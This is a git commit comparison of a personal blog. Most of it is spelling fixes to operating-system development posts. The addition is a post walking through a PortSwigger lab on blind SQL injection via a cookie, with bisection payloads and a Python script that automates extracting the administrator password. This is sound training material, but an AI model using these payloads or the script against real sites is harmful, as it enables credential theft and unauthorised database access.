Compare commits

2 Commits

Author SHA1 Message Date
Drew Galbraith 80e734855c Fix spelling errors in first posts (yikes). 2024-01-23 23:14:03 -08:00
Drew Galbraith adeb3cf394 Blind SQL Injection Post 2024-01-23 23:08:02 -08:00
3 changed files with 243 additions and 17 deletions

View File

@ -111,13 +111,14 @@ On top of the things mentioned above, we use the limine protocol to:
Following boot we immediately initialize the global descriptor table (GDT) and
interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
however it was interesting trying to get it to work with the sysret function
which expects two copies of the user-space segment descriptors to allow returing
to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
(and likely never will) so we just duplicate the 64 bit code segment.
which expects two copies of the user-space segment descriptors to allow
returning to 32bit code from a 64 bit OS. Right now the system doesn't support
32 bit code (and likely never will) so we just duplicate the 64 bit code
segment.
The **IDT** is fairly straightforward and barebones for now. I slowly add more
debugging information to faults as I run into them and it is useful. One of the
biggest improvements was setting up a seperate kernel stack for Page Faults and
biggest improvements was setting up a separate kernel stack for Page Faults and
General Protection Faults. That way if I broke memory related to the current
stack frame I get useful debugging information rather than an immediate triple
fault. I also recently added some very sloppy stack unwind code so I can more
@ -153,9 +154,9 @@ earlier than they need to be it is obvious because things break.
For **virtual memory management** I keep the higher half (kernel) mappings
identical in each address space. Most of the kernel mappings are already
availble from the bootloader but some are added for heaps and additional stacks.
available from the bootloader but some are added for heaps and additional stacks.
For user memory we maintain a tree of the mapped in objects to ensure that none
intersect. Right now the tree is innefficient because it doesn't self balance
intersect. Right now the tree is inefficient because it doesn't self balance
and most objects are inserted in ascending order (i.e. it is essentially a
linked list).
@ -213,7 +214,7 @@ The kernel provides APIs to:
* Allocate memory and map it into an address space.
* Communicate with other processes using Endpoints, Ports, and Channels.
* Register IRQ handlers.
* Manage Capabilites.
* Manage Capabilities.
* Print debug information to the VM output.
### IPC

View File

@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).
Once we have the correct configuration space we cn read the address at offset
Once we have the correct configuration space we can read the address at offset
0x24 (called the ABAR for AHCI Base Address) which points to the start of the
GHC registers.
@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.
Something I'm not sure about is that as soon as we enable interrupts we seem to
receive a FIS from the device with an error bit set. Both the hard drive and the
optical drive on qemu send a FIS with error bit 0x1 set. Additionally the status
optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
field is set to 0x30 for the hard drive and 0x70 for the optical drive.
I was able to find a [OSDev Forum
@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
DIAGNOSTIC command (0x90) to the device. It notes that this is largely
undocumented behavior but at least this information offers some clarity on the
outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
ouputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
present`. According a footnote we can "See the appropriate transport standard
for the definition of device 0 and device 1." I really thought I was already
looking at the "appropriate transport standard" but alas. All that to say we'll
@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
commands to them. To start with lets send the IDENTIFY DEVICE command to each
device. This command asks the device to send 512 bytes of information about
itself back to us. These bytes contain 40 years of certified-crufty backwards
compatability. I mean just feast your eyes on the number of retired and obsolete
compatibility. I mean just feast your eyes on the number of retired and obsolete
fields in just the first page of the spec.
![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
command to the device. To be honest I feel like the specs fall down here in
actually explaining this. The trick is to send a Register Host to Device FIS in one
of the command slots. This FIS type has a field for the command as well as some
common parameters such as lba and count. In retrospect it is fairly clear once
common parameters such as LBA and count. In retrospect it is fairly clear once
you are aware of it, but if you are just reading the SATA spec and looking at
the possible commands, making the logical jump to the Register Host To Device
FIS feels damn near impossible.
@ -379,7 +379,7 @@ Device FIS is as follows:
![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)
We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
call doesn't rely on an lba or sector count. One of the keys is setting the high
call doesn't rely on an LBA or sector count. One of the keys is setting the high
bit "C" in the byte that contains PM Port which indicates to the HBA that this
FIS contains a new command (I spent a while trying to figure out why this wasn't
working without that). The code for this is relatively straightforward.
@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
```
But wait! How will we know when this command has completed? We somehow need to
wait until we receive an interrupt for this command to proccess the data it
wait until we receive an interrupt for this command to process the data it
sent. To handle this we can add a semaphore for each port command slot to allow
signalling when we recieve a completion interrupt for that command. I think it
signalling when we receive a completion interrupt for that command. I think it
might make sense to have some sort of callback instead so we can pass errors
back to the caller instead of just a completion signal. However I'm not sure
what type of errors exist that are resolvable by the caller so for now this
@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
}
```
Ok now that we have retrieved the information from the drive we can parse it.
OK now that we have retrieved the information from the drive we can parse it.
For the sector size, the default is 512 bytes which we will use unless the
`LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
is set we can check the double words at 117 and 118 to get the 32 bit sector
@ -531,7 +531,7 @@ that truly only a mother could love:
![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)
That asside we simply update the FIS construction to set the command, LBA, and
That aside we simply update the FIS construction to set the command, LBA, and
sector count. Following that we set the PRDT values (although we still only use
one slot).

View File

@ -0,0 +1,225 @@
---
title: "Automating Blind SQL Injection on Cookies"
date: 2024-01-23
---
Earlier this evening, I was working through one of the [PortSwigger SQL
injection
labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
which requires you to determine an administrator password by injecting some SQL
into a cookie and checking if the content of the page changes because a
resulting query succeeded or failed.
## The Attack
Say you have a cookie `TrackingId` with a value like `nCoQWoq8E7c6vj1o`. The
page runs a query like `SELECT ... FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o'`
and inserts a "Welcome Back" banner onto the page if the query succeeds, and
leaves it out if the query fails.
This means you can get creative with the value of the cookie to do some SQL
injection and use the boolean output (either the banner displays or it doesn't)
to extract information.
To validate that there is a SQL injection path available you can try the
following two values for the cookie:
```markdown
nCoQWoq8E7c6vj1o' AND '1'='1
nCoQWoq8E7c6vj1o' AND '1'='0
```
This transforms the query from something like this:
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
```
Into your modified query:
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
```
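To make the mechanics concrete, here is a minimal sketch of how a vulnerable server might splice the cookie into its query. The lab's real server code is not visible, so the `build_query` helper and the exact query text are assumptions for illustration only.

```python
def build_query(tracking_id: str) -> str:
    # Hypothetical server-side code: the cookie value is pasted straight
    # into the SQL text instead of being passed as a bound parameter.
    return f"SELECT tracker FROM trackers WHERE id = '{tracking_id}';"


benign = build_query("nCoQWoq8E7c6vj1o")
injected = build_query("nCoQWoq8E7c6vj1o' AND '1'='0")

print(benign)
print(injected)
```

The injected value deliberately leaves its last quote open, because the query's own closing quote finishes the string literal for us.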
Now this might not seem very useful off the bat but you can extract a lot of
information out of the database this way. Consider the following query.
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
(SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
```
Now if the "Welcome Back" banner displayed on the site you would know that you
had properly guessed the admin password because the condition evaluated to true.
On its own this isn't any more helpful than brute forcing the password on the
login page (other than maybe bypassing some rate limits and monitoring).
What speeds this up is guessing one character at a time, and you can bisect the
range of possible characters while you're at it. Consider the following three
queries (borrowed directly from the [PortSwigger
tutorial](https://portswigger.net/web-security/sql-injection/blind)).
```sql
-- This succeeds
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
-- This fails
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
-- This succeeds
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
```
We now know the first letter of the administrator password is 's'!
Looking directly at the cookie values they were as follows:
```markdown
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
```
This is a pretty nifty attack that lets us systematically derive the
administrator's password.
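The narrowing process can be tried offline before touching a real site. The sketch below swaps the server for a stand-in `oracle` function that answers the same `>=` question the banner would. The `SECRET` value and all function names are made up for the demonstration, and it assumes the database compares characters in the same order Python does, which may not hold for every collation.

```python
import string

# Hypothetical stand-in for the real password, used only to simulate the server.
SECRET = "s3cret"
CHARSET = string.digits + string.ascii_lowercase  # ascending ASCII order


def oracle(position: int, candidate: str) -> bool:
    """Simulate the banner: True if the character at the 1-based position is >= candidate."""
    return SECRET[position - 1] >= candidate


def find_character(position: int) -> str:
    lo, hi = 0, len(CHARSET) - 1
    # Invariant: the target character is CHARSET[i] for some lo <= i <= hi.
    while lo < hi:
        mid = (lo + hi + 1) // 2  # round up so the range always shrinks
        if oracle(position, CHARSET[mid]):
            lo = mid
        else:
            hi = mid - 1
    return CHARSET[lo]


recovered = "".join(find_character(i) for i in range(1, len(SECRET) + 1))
print(recovered)
```

Each call to `oracle` corresponds to one page load with a modified cookie, so halving the range keeps the number of requests per character small.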
## The Problem
Happily, I got to work on the lab and started bisecting each letter of the
administrator's password. The issue was that by the time I had done this for 5
letters of the password I was desperately hoping it was only 5 characters long.
I had the same thought at 8 characters, 10 characters, and 16 characters. This
process was incredibly tedious and involved refreshing the page, updating the
cookie info based on what I had just learned, saving the cookie, and refreshing
the page again.
Obviously there had to be a better way, but because I kept feeling like I was
just around the corner from cracking it I ended up powering through all 20
characters of the password. 20! This took me well over 30 minutes I think.
Clearly, this sort of repetitive work is something that should be automated.
## The Solution
So let's take a crack at this using the Python `requests` library (mainly
because it is the one I've used in the past). Let's start by simply getting the
page as is:
```python
import requests
url = "https://{SOME_HEX_ID}.web-security-academy.net/"
r = requests.get(url)
print(r.status_code)
print(r.text)
```
And voilà, it works! At least we don't have to pretend we're a browser or
something to get the page properly. Next up let's try to get the "Welcome Back!"
banner.
```python
cookies = {
    "TrackingId": "CjAZljYSS9X1ZfRg",
}
r = requests.get(url, cookies=cookies)
```
Incredibly this also works on the first try! Now let's generalize this into a
function that tells us whether a specific cookie gets a good response or not.
```python
import sys

import requests


def injection_works(inject_str):
    """Return True if the page shows the banner for the injected cookie."""
    url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
    cookies = {
        "TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
    }
    r = requests.get(url, cookies=cookies)
    if r.status_code != 200:
        # Bail out loudly rather than misreading an error page as "no banner".
        print(r.status_code)
        print(r.text)
        sys.exit("Request failed")
    return "Welcome back!" in r.text


if __name__ == "__main__":
    print(injection_works(""))
```
For the purposes of this we can just match the exact string in the response
text; we don't need to actually parse it using Beautiful Soup or something.
Now we can use this function to bisect the first character like so:
```python
import time


def determine_character(char_num):
    # Parentheses let Python join the two adjacent string literals.
    base_inj_str = (
        "' AND SUBSTRING("
        "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
    )
    # There has got to be a cleaner way to do this right?
    base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
    charset = base_charset[:]
    while len(charset) > 1:
        mid_char_num = len(charset) // 2
        mid_char = charset[mid_char_num]
        inj_str = base_inj_str.format(char_num, mid_char)
        if injection_works(inj_str):
            # The character is less than our midpoint.
            charset = charset[:mid_char_num]
        else:
            # The character is greater than or equal to our midpoint.
            charset = charset[mid_char_num:]
        time.sleep(1)  # Be polite to the server between requests.
        print(charset)
    return charset[0]


if __name__ == "__main__":
    print(determine_character(1))
```
This successfully identifies the first character in the administrator password as
'1'.
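On the "cleaner way" question in the code comment, one option is to build the charset from the standard library's `string` module rather than typing it out. This is only a suggestion, not what the original script does, but it avoids accidentally dropping a letter when writing the alphabet by hand.

```python
import string

# Digits sort before lowercase letters in ASCII, so the concatenation is
# already in the ascending order that bisection relies on.
charset = string.digits + string.ascii_lowercase

print(charset)
print(len(charset))
```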
Finally we just need to do this iteratively until we reach the end of the
password. While doing this manually I learned that when you take a substring
beyond the end of a string in MySQL it just returns an empty string. Let's add
a case to detect that before trying to bisect a character because, as I learned
annoyingly the first time around, the empty string always compares as less than
any single character. We can use that to our advantage and simply test whether
the substring is less than a character we know we won't see (as we know the
password is lowercase alphanumeric), like '!'.
```python
def determine_character(char_num):
    base_inj_str = (
        "' AND SUBSTRING("
        "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
    )
    base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
    # Past the end of the password the substring is empty, which sorts below '!'.
    if injection_works(base_inj_str.format(char_num, '!')):
        return None
    ...
```
Then in the main function we can use an [assignment
expression](https://peps.python.org/pep-0572/) to loop until the function
returns None.
```python
if __name__ == "__main__":
    char_num = 1
    password = ""
    while char := determine_character(char_num):
        password += char
        char_num += 1
    print(password)
```
And this worked on the first try! It got the password in around 3 minutes
(mainly hampered by the slow response time of the server, but I didn't want to
hammer the kind people at PortSwigger by parallelizing this). All told this
took me just over 50 minutes to write (including this blog post, though). And
while that was slightly longer than the time it took me to do this manually, it
was wayyyy less tedious and it's repeatable!
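As a rough sanity check on that runtime, the halving loop can be replayed offline to count how many requests each character costs. The sketch below assumes the full 36-character lowercase alphanumeric set and the same midpoint rule as the script. `requests_for` is a name invented for this illustration and makes no network calls.

```python
import string

CHARSET = string.digits + string.ascii_lowercase


def requests_for(target: str) -> int:
    """Count the oracle calls the halving loop makes to pin down `target`."""
    charset = CHARSET
    count = 0
    while len(charset) > 1:
        mid = len(charset) // 2
        count += 1
        if target < charset[mid]:
            charset = charset[:mid]
        else:
            charset = charset[mid:]
    assert charset == target
    return count


per_char = [requests_for(c) for c in CHARSET]
print(min(per_char), max(per_char))
```

Every character takes five or six requests, so a 20-character password needs roughly 100 to 120 bisection requests plus one end-of-password check per position. With a one-second sleep after each bisection request, that is about two minutes of waiting before any server latency, which lines up with the observed runtime.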
Overall, I found this very enjoyable as I have played with SQL injections in the
past but I haven't tried to automate anything around it and this was a cool
opportunity to do that.